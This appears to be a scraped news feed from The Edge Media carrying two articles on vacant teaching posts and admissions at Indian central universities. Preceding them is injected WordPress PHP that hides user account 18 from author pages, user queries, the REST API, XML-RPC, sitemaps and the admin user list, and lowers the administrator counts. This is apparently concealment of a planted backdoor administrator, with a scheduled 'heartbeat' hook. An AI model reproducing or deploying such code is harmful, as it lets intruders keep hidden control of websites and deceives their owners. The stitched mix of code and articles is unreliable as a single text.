add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Large Scale Recruitment Drive Planned in Higher Education Institutions appeared first on The Edge Media.
]]>In several central universities and medical colleges, many professorial and associate level positions are unfilled. Officials have indicated that vacant posts, especially in reserved categories, have created operational challenges for institutions. To resolve this, the government is examining proposals to expand the total number of posts so that even if reserved seats remain unfilled due to a lack of eligible candidates, general category appointments can still be accommodated without reducing representation norms.
According to available information, around 45 central universities across the country have nearly 5,400 vacant teaching posts. These include positions for Professors, Associate Professors and Assistant Professors. A substantial portion of these vacancies fall under reserved categories. In some institutions, up to 40 percent of sanctioned positions are reportedly vacant.
Data presented in Parliament earlier also highlighted that out of thousands of approved teaching posts, a significant number remain unoccupied. In certain universities, more than 6,000 posts are sanctioned, yet over 2,500 positions are vacant. Nearly half of the sanctioned posts are reserved under various constitutional provisions, and reports suggest that 90 to 95 percent of the vacant positions belong to reserved categories.
The government has directed central institutions to speed up recruitment processes. Universities have been asked to launch special drives to fill reserved category posts on priority. An online recruitment portal has also been introduced to simplify and streamline appointments in central universities.
Earlier, the Supreme Court had directed that vacancies in higher education institutions should be filled within a specified time frame. Following concerns that more than 70 percent of posts were vacant in some institutions, directions were issued to complete recruitment within a few months.
Officials say that the process of converting reserved vacancies into general category posts is lengthy and involves multiple approvals from regulatory bodies and ministries. Because of this, filling posts through reclassification is not considered a quick solution. Instead, increasing the total number of sanctioned posts is being explored as a practical alternative.
Efforts are also underway to conduct interviews and selection procedures in a time bound manner. In some institutions, interviews for faculty recruitment are now being completed within three months to prevent delays.
The proposed expansion in total posts is aimed at ensuring that universities function smoothly without compromising reservation policies. By increasing the sanctioned strength, authorities hope to maintain representation while also addressing faculty shortages that impact teaching and research activities.
The post Large Scale Recruitment Drive Planned in Higher Education Institutions appeared first on The Edge Media.
]]>The post Central Universities Faces Dilemma Due to Cancellation of Class XII Exams appeared first on The Edge Media.
]]>
Central universities are facing a huge dilemma due to the cancellation of the CBSE Class XII examinations. TheĀ University authorities are awaiting notice from the government regarding the admission procedure of the Undergraduate courses.
It is yet to decide whether the admission be based on entrance examinations or the merit lists. On the other hand, common entrance test is also a part of the new National Education Policy. Yet the education ministry needs to take a final decision.
The admission process might also be delayed due to the ongoing pandemic. For the last few years, the central government and UGC are making decisions on behalf of the universities, hence no action can be taken for now.
The post Central Universities Faces Dilemma Due to Cancellation of Class XII Exams appeared first on The Edge Media.
]]>